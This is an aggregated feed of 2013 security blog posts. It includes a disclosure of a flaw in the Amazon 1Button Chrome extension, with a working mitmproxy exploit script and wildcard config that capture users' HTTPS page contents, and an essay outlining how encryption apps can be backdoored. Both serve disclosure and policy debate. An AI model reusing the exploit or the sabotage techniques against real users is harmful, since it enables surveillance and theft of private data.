Shared posts

20 Jul 16:10

Video from SEConference 2013 #2: Ten thousand traps: ZIP, RAR, etc.

As promised, yesterday afternoon I uploaded to YouTube the video recording of my talk from the first day of SEConference in Kraków, during which I talked about the internals of the ZIP format (there were also quite a few demos).

Video: http://www.youtube.com/watch?v=BsFqI8BZ-U0
Slides: http://goo.gl/iU1aT

As for day two, the video/slides are linked in this post.

That's all.
11 Jul 21:24

Study Confirms - Bug Bounties Provide Cost-Effective Value

by Michael Coates
Bug bounties are all the rage today. Mozilla started the first major bounty program in 2004 for Firefox and later added critical websites in 2010; Chrome joined in 2010, Facebook in 2011, and even Microsoft came around recently, in June 2013.


In addition to bounties offered directly through a specific company, there are other programs like HP's ZDI, as well as a new on-demand approach to bug bounties for any company offered by BugCrowd.

But, are bug bounties worth the time to manage, foster the research community, and the cost of the rewards? As someone who has been deeply involved in Mozilla's bounty program my answer has always been a resounding yes.

My opinion aside, I'm happy to now also draw attention to a Berkeley Study from Matthew Finifter, Devdatta Akhawe, and David Wagner titled An Empirical Study of Vulnerability Rewards Programs.

A few select quotes from the study:

On cost & value:

Both programs appear economically efficient, comparing favorably to the cost of hiring full-time security researchers. (pg 1)

We find that VRPs appear to provide an economically efficient mechanism for finding vulnerabilities, with a reasonable cost/benefit trade-off (Sections 4.1.1 and 4.1.6). (pg 6)

Benefits of a bug bounty program:

VRPs offer a number of potential attractions to software vendors. Offering adequate incentives entices security researchers to look for vulnerabilities, and this increased attention improves the likelihood of finding latent vulnerabilities.

Second, coordinating with security researchers allows vendors to more effectively manage vulnerability disclosures, reducing the likelihood of unexpected and costly zero-day disclosures. Monetary rewards provide an incentive for security researchers not to sell their research results to malicious actors in the underground economy or the gray world of vulnerability markets.

Third, VRPs may make it more difficult for black hats to find vulnerabilities to exploit. Patching vulnerabilities found through a VRP increases the difficulty and therefore cost for malicious actors to find zero-days because the pool of latent vulnerabilities has been diminished. Additionally, experience gained from VRPs (and exploit bounties [23,28]) can yield improvements to mitigation techniques and help identify other related vulnerabilities and sources of bugs.
Finally, VRPs often engender goodwill amongst the community of security researchers. Taken together, VRPs provide an attractive tool for increasing product security and protecting customers. (pg 1)

Lastly, I presented on bug bounty programs for websites a few years back at OWASP AppSecUSA. My slides from that talk can be found on slideshare.
 



-Michael Coates - @_mwc
11 Jul 21:23

Jealous of PRISM? Use "Amazon 1 Button" Chrome extension to sniff all HTTPS websites!

by Krzysztof Kotowicz
tldr: Insecure browser addons may leak all your encrypted SSL traffic, exploits included

So, Snowden let the cat out of the bag. They're listening - the news is so big that feds are no longer welcome at DEFCON. But let's all be honest - who doesn't like to snoop into other people's secrets? We all know how to set up a rogue AP and use ettercap. Setting up your own wall of sheep is trivial. I think we can safely assume that plaintext traffic is dead easy to sniff and modify.

The real deal, though, is in the encrypted traffic. In the browser's world that means all the juicy stuff is sent over HTTPS. Intercepting HTTPS connections is possible, but only via:
  • hacking the CA
  • social engineering (install the certificate) 
  • relying on click-through syndrome for SSL warnings
Too hard. Let's try some side channels. Let me show you how you can view all SSL-encrypted data by exploiting the Amazon 1Button App installed on your victims' browsers.

The extension info

Some short info about our hero of the day:

Amazon 1Button App Chrome extension
Version: 3.2013.627.0
Updated: June 28, 2013

1,791,011 users (scary, because the extension needs the following permissions):

Amazon cares for your privacy...not

First, a little info about how it abuses your privacy, in case you already use it (tldr: uninstall NOW!). There are a few interesting things going on (all of them require no user interaction and are based on default settings):

It reports to Amazon every URL you visit, even HTTPS URLs.

GET /gp/bit/apps/web/SIA/scraper?url=https://gist.github.com/ HTTP/1.1
Host: www.amazon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Referer: https://gist.github.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,pl;q=0.6
Cookie: lots-of-amazon-cookies
Unfortunately, this request goes over HTTPS, so only Amazon can know your URLs. You might want to look at Firefox version of the extension though (hint, hint).

It's against what they claim in their Privacy Policy:
The Amazon Browser Apps may also collect information about the websites you view, but that information is not associated with your Amazon account or identified with you. 
Well, the request to https://www.amazon.com/gp/bit/apps/web/SIA/scraper?url=https://gist.github.com/ sends a lot of my Amazon cookies, doesn't it? But that's just the start.

Amazon XSS-es every website you visit

The so-called SIA feature of the extension is just that:
// main.js in extension code
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
    if (siaEnabled && changeInfo.status === 'complete') {
        Logger.log('Injecting SIA');
        storage.get('options.ubp_root', function(options_root) {
    var root = options_root['options.ubp_root'];
            chrome.tabs.executeScript(null, { code: "(function() { var s = document.createElement('script'); s.src = \"" + root + "/gp/bit/apps/web/SIA/scraper?url=\" + document.location.href; document.body.appendChild(s);}());" });
        });
    }
});
So, it attaches an external <script> to every website you visit, and its code can be tailored to the exact URL of the page. To be fair, the script currently served for all tested websites is just a harmless empty function.
 
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jul 2013 11:14:34 GMT
Content-Type: text/javascript; charset=UTF-8
...
 
(function(window,document){})(window,document);
So it's just like a ninja sent to every house, awaiting further orders. /me doesn't like this anyway. Who knows which sites are modified - maybe it depends on your location, Amazon ID, etc.

It reports contents of certain websites you visit to Alexa

Yes, not just URLs. For example, your Google searches over HTTPS, and the first few results, are now known to Alexa as well.
POST http://widgets.alexa.com/traffic/rankr/?ref=https%3A%2F%2Fwww.google.pl%2Fsearch%3F...t%2526q%253Dhow%252Bto%252Boverthrow%252Ba%252Bgovernment... HTTP/1.1
Host: widgets.alexa.com
Proxy-Connection: keep-alive
Content-Length: 662
accept: application/xml
Origin: chrome-extension://pbjikboenpfhbbejgkoklgkhjpfogcam
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,pl;q=0.6
Cookie: aid=JRDTh1rpFM00ES

http://rense.com/general50/hwt.htm
http://en.wikipedia.org/wiki/Coup_d'%C3%A9tat
http://www.law.cornell.edu/uscode/text/18/2385
http://www.thefreedictionary.com/overthrow
http://io9.com/5574009/how-to-overthrow-the-government-tips-from-10-science-fiction-revolutionaries
http://williamblum.org/essays/read/overthrowing-other-peoples-governments-the-master-list
http://www.telegraph.co.uk/news/worldnews/northamerica/usa/9504380/US-soldiers-plotted-to-overthrow-government.html
http://ariannaonline.huffingtonpost.com/books/overthrow/
http://www.amazon.com/How-Overthrow-Government-Arianna-Huffington/dp/B000C4SYPC
http://codes.lp.findlaw.com/uscode/18/I/115/2385
Here's an example Google search and a view of what's sent over the proxy.
 
Notice that the URL and extracted page information travel over plain HTTP to http://widgets.alexa.com. So man-in-the-middle attackers can access the information that the extension is configured to send to Alexa.

Bottom line - Amazon is evil.

Amazon, did you just.... really?!

The real problem, though, is that attackers can actively exploit the described extension features to hijack your information, e.g. get access to your HTTPS URLs and page contents. The extension dynamically configures itself by fetching information from Amazon. Namely, upon installation (and then periodically) it requests and processes two config files. An example config is presented below:
// httpsdatalist.dat
[
  "https:[/]{2}(www[0-9]?|encrypted)[.](l.)?google[.].*[/]"
]
// search_conf.js
{
  "google" : {
    "urlexp" : "http(s)?:\\/\\/www\\.google\\..*\\/.*[?#&]q=([^&]+)",
    "rankometer" :  {
      "url"   :"http(s)?:\\/\\/(www(|[0-9])|encrypted)\\.(|l\\.)google\\..*\\/",
      "reload": true,
      "xpath" : {
        "block": [
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]",
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]",
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]"
        ],
        "insert" : [
          "./div/div/div/cite",
          "./div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite",
          "./div/div/div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite"
        ],
        "target" : [
          "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href",
          "./h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href",
          "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href"
        ]
      }
    },
    ...
  },
  ...
The first file defines which HTTPS sites can be inspected. The second defines URL patterns to watch for, and XPath expressions to extract the content reported back to Alexa. The files are fetched from these URLs:
Yes. The configuration for reporting extremely private data is sent over plaintext HTTP. WTF, Amazon?
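To make the config concrete, here is a minimal sketch of how those two files drive the scraping. It applies the `urlexp` pattern from search_conf.js and the allow-list entry from httpsdatalist.dat (with the JSON backslash escapes removed) to a hypothetical Google search URL; the URL itself is made up for illustration:

```python
import re

# "urlexp" from search_conf.js, with JSON backslash escapes unescaped
urlexp = r"http(s)?:\/\/www\.google\..*\/.*[?#&]q=([^&]+)"

# httpsdatalist.dat entry: which HTTPS sites may be inspected at all
https_allowed = r"https:[/]{2}(www[0-9]?|encrypted)[.](l.)?google[.].*[/]"

url = "https://www.google.com/search?q=how+to+overthrow+a+government"

# the site passes the HTTPS allow-list...
assert re.match(https_allowed, url)

# ...and the urlexp's second group captures the search query itself
m = re.search(urlexp, url)
assert m.group(2) == "how+to+overthrow+a+government"
```

Once a URL matches both, the XPath expressions from the config extract the result links that end up in the plaintext POST to widgets.alexa.com.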

Exploitation

Exploiting this is very simple:
  1. Set up (or simulate) an HTTP man-in-the-middle
  2. Listen for HTTP requests for the above config files
  3. Respond with a wildcard configuration (listen on all https:// sites & extract the whole body)
  4. Log all subsequent HTTP requests to Alexa, gathering previously encrypted client webpages.
For demonstration purposes, I've made a mitmproxy script that converts Amazon 1Button Chrome extension to poor man's transparent HTTPS->HTTP proxy.
#!/usr/bin/env python

def start(sc):
    sc.log("Amazon One Click pwner started")

def response(sc, f):
    if f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/search_conf.js'):
        f.response.decode() # removes gzip header
        f.response.content = open('pwn.json','r').read()
    elif f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/httpsdatalist.dat'):
        f.response.decode() # removes gzip header
        f.response.content = '["https://"]' # log'em all


def request(sc, f):
    if f.request.path.startswith('/traffic/rankr/'):
        q = f.request.get_query()
        p = q.get_first('ref')
        if p and f.request.content:
            c = open('pwn.log', 'a')
            c.write(p + "\n" + f.request.get_decoded_content() + "\n============\n")
            c.close()

and the complementary pwn.json:

{
  "pwn" : {
    "urlexp" : "http(s)?:\\/\\/",
    "rankometer" :  {
      "url"   :"http(s)?:\\/\\/",
      "reload": true,
      "xpath" : {
        "block": [
          "//html"
        ],
        "insert" : [
          "//html"
        ],
        "target" : [
          "//html"
         ]
      }
    },
    "cba" : {
        "url"   :"http(s)?:\\/\\/",
        "reload": true
    }
  }
}
To start the attack, simply route all HTTP (port 80) traffic to mitmproxy and launch the script:
$ mitmproxy -s pwn.py
Now install the extension in your Chrome (or disable and re-enable it to quickly reload the configuration) and start browsing. All captured HTTPS data will end up in the pwn.log file.



Exploit source: GitHub

Limitations

  • We are limited to XPath expressions to retrieve content, so I can't return the usual HTML source, nor can I access headers, etc. The closest I got is the string value of the //html node, which is roughly the concatenated text content of the page
  • Snooping on AJAX applications works poorly, as the extension does not report XMLHttpRequest responses
  • We are only passively listening, no option to modify traffic 
Nevertheless, there's plenty of private info in the captured traffic: CSRF tokens, session IDs, email contents, Google Drive document contents, you name it. Thank you, Amazon, for protecting my privacy. But seriously - move all your extension traffic to HTTPS only. Better yet, remove the tracking code altogether.

I've done other research on Google Chrome extension security - read more if you find the topic interesting.

Update: One day after publication, Amazon did not stop tracking, but it did fix the vulnerability - the config links are now served over HTTPS. Once again, full disclosure helped ordinary folks' security.
22 Jun 10:28

How to 'backdoor' an encryption app

by Matthew Green
Over the past week or so there's been a huge burst of interest in encryption software. Applications like Silent Circle and RedPhone have seen a major uptick in new installs. CryptoCat alone has seen a zillion new installs, prompting several infosec researchers to nearly die of irritation.

From my perspective this is a fantastic glass of lemonade, if one made from particularly bitter lemons. It seems all we ever needed to get encryption into the mainstream was... ubiquitous NSA surveillance. Who knew?

Since I've written about encryption software before on this blog, I received several calls this week from reporters who want to know what these apps do. Sooner or later each interview runs into the same question: what happens when somebody plans a crime using one of these? Shouldn't law enforcement have some way to listen in?

This is not a theoretical matter. The FBI has been floating a very real proposal that will either mandate wiretap backdoors in these systems, or alternatively will impose fines on providers that fail to cough up user data. This legislation goes by the name 'CALEA II', after the CALEA act which governs traditional (POTS) phone wiretapping.

Personally I'm strongly against these measures, particularly the ones that target client software. Mandating wiretap capability jeopardizes users' legitimate privacy needs and will seriously hinder technical progress in this area. Such 'backdoors' may be compromised by the very same criminals we're trying to stop. Moreover, smart/serious criminals will easily bypass them.

To me, a more interesting question is how such 'backdoors' would even work. This isn't something you can really discuss in an interview, which is why I decided to blog about them. The answers range from 'dead stupid' to 'diabolically technical', with the best answers sitting somewhere in the middle. Even if many of these are pretty obvious from a technical perspective, we can't really have a debate until they've all been spelled out.

And so: in the rest of this post I'm going to discuss five of the most likely ways to add backdoors to end-to-end encryption systems.
1. Don't use end-to-end encryption in the first place (just say you do.)
There's no need to kick down the door when you already have the keys. Similarly there's no reason to add a 'backdoor' when you already have the plaintext. Unfortunately this is the case for a shocking number of popular chat systems -- ranging from Google Talk (er, 'Hangouts') to your typical commercial Voice-over-IP system. The same statement also applies to at least some components of more robust systems: for example, Skype text messages.

Many of these systems use encryption at some level, but typically only to protect communications from the end user to the company's servers. Once there, the data is available to capture or log to your heart's content.
2. Own the directory service (or be the Certificate Authority).
Fortunately an increasing number of applications really do encrypt voice and text messages end-to-end -- meaning that the data is encrypted all the way from sender directly to the recipient. This cuts the service out of the equation (mostly), which is nice. But unfortunately it's only half the story.

The problem here is that encrypting things is generally the easy bit. The hard part is distributing the keys (key signing parties anyone?) Many 'end-to-end' systems -- notably Skype*, Apple's iMessage and Wickr -- try to make your life easier by providing a convenient 'key lookup service', or else by acting as trusted certificate authorities to sign your keys. Some will even store your secret keys.**

This certainly does make life easier, both for you and the company, should it decide to eavesdrop on you. Since the service controls the key, it can just as easily send you its own public key -- or a public key belonging to the FBI. This approach makes it ridiculously easy for providers to run a Man-in-the-Middle attack (MITM) and intercept any data they want.

This is always the best way to distinguish serious encryption systems from their lesser cousins. When a company tells you they're encrypting end-to-end, just ask them: how are you distributing keys? If they can't answer -- or worse, they blabber about 'military grade encryption' -- you might want to find another service.
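The failure mode is easy to sketch. In this toy model (every name and 'key' below is a hypothetical placeholder, not any real service's API), the provider's lookup service answers key queries, and nothing stops it from answering differently for a targeted user:

```python
# Toy model of a provider-run key directory. Strings stand in for real
# public keys; "FBI_PUBKEY" marks the substituted interception key.
real_keys = {"bob": "BOB_PUBKEY"}
mitm_keys = {"bob": "FBI_PUBKEY"}  # injected only for targeted users

def lookup(user, targeted=False):
    # Alice's client just trusts whatever the directory returns --
    # she has no independent way to tell these two answers apart.
    return (mitm_keys if targeted else real_keys)[user]

# Normally Alice encrypts to Bob's real key...
assert lookup("bob") == "BOB_PUBKEY"
# ...but for a targeted user the directory hands out the MITM key,
# and the protocol run looks exactly the same from Alice's side.
assert lookup("bob", targeted=True) == "FBI_PUBKEY"
```

The point of the sketch: because key distribution and message transport are run by the same party, the substitution is invisible at the protocol level.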
3. Metadata is the new data.
The best encryption systems push key distribution offline, or even better, perform a true end-to-end key exchange that only involves the parties to the communication. The latter applies to several protocols -- notably OTR and ZRTP -- used by apps like Silent Circle, RedPhone and CryptoCat.

You still have to worry about the possibility that an attacker might substitute her own key material in the connection (an MITM attack). So the best of these systems add a verification phase in which the parties check a key fingerprint -- preferably in person, but possibly by reading it over a voice connection (you know what your friend's voice sounds like, don't you?). Some programs will even convert the fingerprint into a short 'authentication string' that you can read to your friend.
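Such an authentication string can be as simple as hashing the negotiated key material down to a few dictionary words. This is a rough sketch only -- the wordlist, truncation, and hash input below are invented for illustration, not taken from any particular protocol:

```python
import hashlib

# Hypothetical 4-word toy dictionary; real schemes (e.g. ZRTP's SAS)
# use larger wordlists and carefully specified hash inputs.
WORDS = ["alpha", "bravo", "charlie", "delta"]

def auth_string(shared_secret: bytes, n_words: int = 4) -> str:
    # Hash the session secret, then map the first few bytes to words.
    digest = hashlib.sha256(shared_secret).digest()
    return " ".join(WORDS[b % len(WORDS)] for b in digest[:n_words])

# Both endpoints derive the string from the same session secret and
# read it aloud. An MITM splits the call into two sessions with two
# different secrets, so the strings the parties read won't match.
alice = auth_string(b"session-secret")
bob = auth_string(b"session-secret")
assert alice == bob
```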


From a cryptographic perspective the design of these systems is quite good. But you don't need to attack the software to get useful information out of them. That's because while encryption may hide what you say, it doesn't necessarily hide who you're talking to.

The problem here is that someone needs to move your (encrypted) data from point A to point B. Typically this work is done by a server operated by the company that wrote the app. While the server may not be able to eavesdrop on you, it can easily log the details (including IP addresses) of each call. This is essentially the same data the NSA collects from phone carriers.

Particularly when it comes to VoIP (where anonymity services like Tor just aren't very effective), this is a big problem. Some companies are out ahead of it: Silent Circle (a company whose founders have threatened to chew off their own limbs rather than comply with surveillance orders) doesn't log any IP addresses. One hopes the other services are as careful.

But even this isn't perfect: just because you choose not to collect doesn't mean you can't. If the government shows up with a National Security Letter compelling your compliance -- or just hacks your servers -- that information will be obtained.
4. Escrow your keys.
If you want to add real eavesdropping backdoors to a properly-designed encryption protocol you have to take things to a whole different level. Generally this requires that you modify the encryption software itself.

If you're doing this above board you'd refer to it as 'key escrow'. A simple technique is just to add an extra field to the wire protocol. Each time your clients agree on a session key, you have one of the parties encrypt that key under the public key of a third party (say, the encryption service, or a law enforcement agency). The encrypted key gets shipped along with the rest of the handshake data. PGP used to provide this as an optional feature, and the US government unsuccessfully tried to mandate an escrow-capable system called Clipper.***
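The mechanics can be sketched in a few lines. This uses toy textbook RSA with tiny primes -- insecure and purely illustrative; the handshake field name is made up:

```python
# Toy textbook RSA escrow (tiny primes, no padding -- illustration only).
p, q = 61, 53
n = p * q                           # escrow modulus
e = 17                              # escrow public exponent
d = pow(e, -1, (p - 1) * (q - 1))   # escrow private exponent (Python 3.8+)

session_key = 42                    # stand-in for the negotiated symmetric key

# Client side: one party encrypts the fresh session key under the escrow
# party's public key and ships it alongside the normal handshake fields.
handshake = {
    "cipher": "toy",
    "escrow_field": pow(session_key, e, n),   # E_escrow(session_key)
}

# Escrow agent side: recover the session key from a captured handshake.
recovered = pow(handshake["escrow_field"], d, n)
assert recovered == session_key
```

Everything then hinges on who holds `d` and how well it is guarded, which is exactly the worry discussed next.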

In theory key escrow features don't weaken the system. In practice this is debatable. The security of every connection now depends on the security of your master 'escrow' secret key. And experience tells us that wiretapping systems are surprisingly vulnerable. In 2009, for example, a group of Chinese hackers were able to breach the servers used to manage Google's law enforcement surveillance infrastructure -- giving them access to confidential data on every target the US government was surveilling.

One hopes that law enforcement escrow keys would be better secured. But they probably won't be.
5. Compromise, Update, Exfiltrate.
But what if your software doesn't have escrow functionality? Then it's time to change the software.

The simplest way to add an eavesdropping function is just to issue a software update. Ship a trustworthy client, ask your users to enable automatic updates, then deliver a new version when you need to. This gets even easier now that some operating systems are adding automatic background app updates.

If updates aren't an option, there are always software vulnerabilities. If you're the one developing the software you have some extra capabilities here. All you need to do is keep track of a few minor vulnerabilities in your server-client communication protocol -- which may be secured by SSL and thus protected from third party exploits. These can be weaknesses as minor as an uninitialized memory structure or a 'wild read' that can be used to scan key material.

Or better yet, put your vulnerabilities in at the level of the crypto implementation itself. It's terrifyingly easy to break crypto code -- for example, the difference between a working random number generator and a badly broken one can be a single line of code, or even a couple of instructions. Re-use some counters in your AES implementation, or (better yet) implement ECDSA without a proper random nonce. You can even exfiltrate your keys using a subliminal channel.
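As a hedged illustration of how small that diff can be: the 'broken' generator below differs from the good one only in where its seed comes from, yet its output is fully predictable to whoever planted the constant. (The seed value and function names are invented for the example.)

```python
import os
import random

def good_nonce() -> bytes:
    # OS CSPRNG: unpredictable to everyone, including the vendor.
    return os.urandom(32)

def backdoored_nonce() -> bytes:
    # One-line sabotage: a fixed seed known to the backdoor's author,
    # so every call replays the same "random" bytes.
    rng = random.Random(0xDEADBEEF)
    return bytes(rng.getrandbits(8) for _ in range(32))

assert backdoored_nonce() == backdoored_nonce()  # attacker can re-derive it
assert good_nonce() != good_nonce()              # vanishingly unlikely to repeat
```

With ECDSA in particular this is fatal: two signatures made with the same nonce are enough to recover the signing key.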

Or just write a simple exploit like the normal kids do.

Unfortunately there's very little we can do about things like this. Probably the best defense is to use open source code, disable software updates until others have reviewed them, and then pray you're never the target of a National Security Letter. Because if you are -- none of this crap is going to save you.

Conclusion

I hope nobody comes away with the wrong idea about any of this. I wouldn't seriously recommend that anyone add backdoors to a piece of encryption software. In fact, this is just about the worst idea in the world.

That said, encryption software is likely to be a victim of its own success. Either we'll stay in the technical ghetto, with only a few boring nerds adopting the technology. Or the world will catch on. And then the pressure will come. At that point the authors of these applications are going to face some tough choices. I don't envy them one bit.

Notes:

* See this wildly out of date security analysis (still available on Skype's site) for a description of how this system worked circa 2005.

** A few systems (notably Hushmail back in the 90s) will store your secret keys encrypted under a password. This shouldn't inspire a lot of confidence, since passwords are notoriously easy to crack. Moreover, if the system has a 'password recovery' service (such as Apple's iForgot) you can more or less guarantee that even this kind of encryption isn't happening.

*** The story of Clipper (and how it failed) is a wonderful one. Go read Matt Blaze's paper.
08 Jun 09:23

Daily strip 06. Jun 2013

29 Apr 07:22

Rodzinka pe el

by remo29@NOSPAM.gazeta.pl